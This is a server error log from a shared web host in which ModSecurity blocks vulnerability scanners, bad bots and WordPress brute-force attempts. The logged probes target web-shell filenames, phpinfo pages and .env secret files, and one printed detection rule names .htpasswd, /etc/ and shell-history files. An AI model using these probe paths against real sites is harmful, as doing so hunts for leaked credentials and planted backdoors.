[Tue May 26 13:18:39.335027 2026] [security2:error] [pid 501489:tid 501625] [client 4.201.75.230:2332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/tmp.php"] [unique_id "ahVQV2kFNZ9cRlz80IjbeAAAAIs"]
[Tue May 26 13:18:39.792593 2026] [security2:error] [pid 501489:tid 501630] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQV2kFNZ9cRlz80IjbgAAAAJA"]
[Tue May 26 13:18:41.663313 2026] [security2:error] [pid 501489:tid 501705] [client 4.201.75.230:2320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-admin/a.php"] [unique_id "ahVQWWkFNZ9cRlz80IjbwQAAANo"]
[Tue May 26 13:18:42.138795 2026] [security2:error] [pid 501489:tid 501749] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQWWkFNZ9cRlz80IjbxgAAAQI"]
[Tue May 26 13:18:43.227999 2026] [security2:error] [pid 501489:tid 501743] [client 74.7.244.29:45108] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.pronumbers.com.au"] [uri "/cgi-sys/404.html"] [unique_id "ahVQW2kFNZ9cRlz80Ijb8wAA_FY"]
[Tue May 26 13:18:44.037262 2026] [security2:error] [pid 501489:tid 501648] [client 114.119.144.36:52381] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.athelstan.org.in"] [uri "/robots.txt"] [unique_id "ahVQXGkFNZ9cRlz80IjcBQAAAKE"]
[Tue May 26 13:18:44.694813 2026] [security2:error] [pid 501489:tid 501738] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQXGkFNZ9cRlz80IjcEAAAAPc"]
[Tue May 26 13:18:45.321661 2026] [security2:error] [pid 501489:tid 501652] [client 4.201.75.230:2359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-admin/alfa.php"] [unique_id "ahVQXWkFNZ9cRlz80IjcKAAAAKU"]
[Tue May 26 13:18:45.498977 2026] [security2:error] [pid 501489:tid 501674] [client 85.11.167.49:64516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/phpinfo.php"] [unique_id "ahVQXWkFNZ9cRlz80IjcKQAAALs"]
[Tue May 26 13:18:45.753773 2026] [security2:error] [pid 501489:tid 501700] [client 85.11.167.49:64647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/test.php"] [unique_id "ahVQXWkFNZ9cRlz80IjcNwAAANU"]
[Tue May 26 13:18:46.148068 2026] [security2:error] [pid 501489:tid 501662] [client 85.11.167.49:64760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/info.php"] [unique_id "ahVQXmkFNZ9cRlz80IjcPwAAAK8"]
[Tue May 26 13:18:46.404635 2026] [security2:error] [pid 501489:tid 501625] [client 85.11.167.49:64961] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/php.php"] [unique_id "ahVQXmkFNZ9cRlz80IjcTAAAAIs"]
[Tue May 26 13:18:46.663061 2026] [security2:error] [pid 501489:tid 501727] [client 85.11.167.49:65060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/php_info.php"] [unique_id "ahVQXmkFNZ9cRlz80IjcVQAAAO4"]
[Tue May 26 13:18:46.926125 2026] [security2:error] [pid 501489:tid 501739] [client 85.11.167.49:65154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/i.php"] [unique_id "ahVQXmkFNZ9cRlz80IjcXwAAAPg"]
[Tue May 26 13:18:47.183577 2026] [security2:error] [pid 501489:tid 501675] [client 85.11.167.49:65222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/pi.php"] [unique_id "ahVQX2kFNZ9cRlz80IjcZwAAALw"]
[Tue May 26 13:18:47.229682 2026] [security2:error] [pid 501489:tid 501738] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQXmkFNZ9cRlz80IjcWwAAAPc"]
[Tue May 26 13:18:47.593083 2026] [security2:error] [pid 501489:tid 501629] [client 85.11.167.49:65299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/admin/phpinfo.php"] [unique_id "ahVQX2kFNZ9cRlz80IjcdQAAAI8"]
[Tue May 26 13:18:47.851664 2026] [security2:error] [pid 501489:tid 501718] [client 85.11.167.49:65424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/pinfo.php"] [unique_id "ahVQX2kFNZ9cRlz80IjcfgAAAOc"]
[Tue May 26 13:18:48.109007 2026] [security2:error] [pid 501489:tid 501680] [client 85.11.167.49:65495] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/php_version.php"] [unique_id "ahVQYGkFNZ9cRlz80IjchAAAAME"]
[Tue May 26 13:18:48.500689 2026] [security2:error] [pid 501489:tid 501667] [client 85.11.167.49:49175] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVQYGkFNZ9cRlz80IjclwAAALQ"]
[Tue May 26 13:18:48.903211 2026] [security2:error] [pid 501489:tid 501671] [client 85.11.167.49:49175] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/.env.backup"] [unique_id "ahVQYGkFNZ9cRlz80IjcqwAAALg"]
[Tue May 26 13:18:49.033473 2026] [security2:error] [pid 501489:tid 501741] [client 85.11.167.49:49175] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/config/.env"] [unique_id "ahVQYWkFNZ9cRlz80IjcrwAAAPo"]
[Tue May 26 13:18:52.050035 2026] [security2:error] [pid 501489:tid 501728] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQY2kFNZ9cRlz80Ijc8wAAAO8"]
[Tue May 26 13:18:53.199025 2026] [security2:error] [pid 501489:tid 501622] [client 4.201.75.230:2340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-admin/network/index.php"] [unique_id "ahVQZWkFNZ9cRlz80IjdJwAAAIg"]
[Tue May 26 13:18:53.497452 2026] [security2:error] [pid 501489:tid 501707] [client 193.19.109.28:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVQZGkFNZ9cRlz80IjdFAAA3Gs"]
[Tue May 26 13:18:54.720480 2026] [security2:error] [pid 501489:tid 501608] [remote 74.7.241.58:51600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVQZmkFNZ9cRlz80IjdVwAAtXY"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:18:55.088603 2026] [security2:error] [pid 501489:tid 501689] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQZmkFNZ9cRlz80IjdUwAAAMo"]
[Tue May 26 13:18:55.198202 2026] [security2:error] [pid 501489:tid 501742] [client 4.201.75.230:2318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/core-plugin/include.php"] [unique_id "ahVQZ2kFNZ9cRlz80IjdYAAAAPs"]
[Tue May 26 13:18:56.267254 2026] [security2:error] [pid 501489:tid 501694] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQZ2kFNZ9cRlz80IjdeQAAAM8"]
[Tue May 26 13:18:58.223864 2026] [security2:error] [pid 501489:tid 501650] [client 85.208.96.203:46796] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVQamkFNZ9cRlz80IjdwgAAAKM"]
[Tue May 26 13:18:58.223960 2026] [security2:error] [pid 501489:tid 501650] [client 85.208.96.203:46796] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVQamkFNZ9cRlz80IjdwgAAAKM"]
[Tue May 26 13:18:58.536935 2026] [security2:error] [pid 501489:tid 501658] [client 4.201.75.230:2334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-includes/IXR/test1.php"] [unique_id "ahVQamkFNZ9cRlz80IjdzAAAAKs"]
[Tue May 26 13:18:58.538112 2026] [security2:error] [pid 501489:tid 501680] [client 145.239.10.137:53101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.10.239.145.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/Masks.php"] [unique_id "ahVQamkFNZ9cRlz80IjdzQAAAME"], referer: http://glorodavionics.com/Masks.php
[Tue May 26 13:18:59.265605 2026] [security2:error] [pid 501489:tid 501714] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQamkFNZ9cRlz80Ijd1wAAAOM"]
[Tue May 26 13:19:00.046515 2026] [security2:error] [pid 501489:tid 501666] [client 172.98.32.42:25311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVQa2kFNZ9cRlz80Ijd-gAAALM"]
[Tue May 26 13:19:00.822941 2026] [security2:error] [pid 501489:tid 501632] [client 145.239.10.137:60930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.10.239.145.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodbalsa.com"] [uri "/Masks.php"] [unique_id "ahVQbGkFNZ9cRlz80IjeFwAAAJI"], referer: http://glorodbalsa.com/Masks.php
[Tue May 26 13:19:01.830206 2026] [security2:error] [pid 501489:tid 501623] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQbWkFNZ9cRlz80IjeKgAAAIk"]
[Tue May 26 13:19:02.992910 2026] [security2:error] [pid 501489:tid 501630] [client 104.238.32.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVQbmkFNZ9cRlz80IjeRwAAAJA"]
[Tue May 26 13:19:03.576565 2026] [security2:error] [pid 501489:tid 501718] [client 123.21.181.141:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQb2kFNZ9cRlz80IjeWQAAAOc"]
[Tue May 26 13:19:03.593880 2026] [security2:error] [pid 501489:tid 501696] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQb2kFNZ9cRlz80IjeXwAAANE"]
[Tue May 26 13:19:06.556511 2026] [security2:error] [pid 501489:tid 501720] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQcmkFNZ9cRlz80IjesQAAAOk"]
[Tue May 26 13:19:08.371321 2026] [security2:error] [pid 501489:tid 501748] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQc2kFNZ9cRlz80Ije5wAAAQE"]
[Tue May 26 13:19:10.834655 2026] [security2:error] [pid 501489:tid 501675] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQdmkFNZ9cRlz80IjfJQAAALw"]
[Tue May 26 13:19:11.340126 2026] [security2:error] [pid 501489:tid 501537] [remote 216.73.217.110:35630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/online.php"] [unique_id "ahVQd2kFNZ9cRlz80IjfOAAAsi8"]
[Tue May 26 13:19:13.653291 2026] [security2:error] [pid 501489:tid 501731] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQeWkFNZ9cRlz80IjfZgAAAPE"]
[Tue May 26 13:19:14.769063 2026] [security2:error] [pid 501489:tid 501654] [client 66.249.64.42:39841] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQeWkFNZ9cRlz80IjfcgAAAKc"], referer: https://mosykay.com/prizes/270115379
[Tue May 26 13:19:16.151046 2026] [security2:error] [pid 501489:tid 501735] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQe2kFNZ9cRlz80IjfogAAAPU"]
[Tue May 26 13:19:16.740231 2026] [autoindex:error] [pid 501489:tid 501641] [client 119.28.122.202:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:19:17.690845 2026] [security2:error] [pid 501489:tid 501674] [client 85.208.96.210:59964] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVQfWkFNZ9cRlz80Ijf0wAAALs"]
[Tue May 26 13:19:17.690946 2026] [security2:error] [pid 501489:tid 501674] [client 85.208.96.210:59964] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVQfWkFNZ9cRlz80Ijf0wAAALs"]
[Tue May 26 13:19:18.631707 2026] [security2:error] [pid 501489:tid 501659] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQfmkFNZ9cRlz80Ijf3wAAAKw"]
[Tue May 26 13:19:20.380952 2026] [security2:error] [pid 501489:tid 501671] [client 74.249.173.207:4436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wk/index.php"] [unique_id "ahVQgGkFNZ9cRlz80IjgJAAAALg"]
[Tue May 26 13:19:20.891127 2026] [security2:error] [pid 501489:tid 501728] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQgGkFNZ9cRlz80IjgMAAAAO8"]
[Tue May 26 13:19:21.089572 2026] [security2:error] [pid 501489:tid 501683] [client 51.68.111.205:26649] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kingsclubmembership.com"] [uri "/robots.txt"] [unique_id "ahVQgWkFNZ9cRlz80IjgQwAAAMQ"]
[Tue May 26 13:19:21.089692 2026] [security2:error] [pid 501489:tid 501683] [client 51.68.111.205:26649] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "kingsclubmembership.com"] [uri "/robots.txt"] [unique_id "ahVQgWkFNZ9cRlz80IjgQwAAAMQ"]
[Tue May 26 13:19:21.909287 2026] [security2:error] [pid 501489:tid 501714] [client 74.249.173.207:4440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/inputs.php"] [unique_id "ahVQgWkFNZ9cRlz80IjgUQAAAOM"]
[Tue May 26 13:19:22.539192 2026] [security2:error] [pid 501489:tid 501568] [remote 121.200.216.55:45272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVQgmkFNZ9cRlz80IjgWQAAkE4"]
[Tue May 26 13:19:22.785192 2026] [security2:error] [pid 501489:tid 501639] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQgmkFNZ9cRlz80IjgXAAAAJk"]
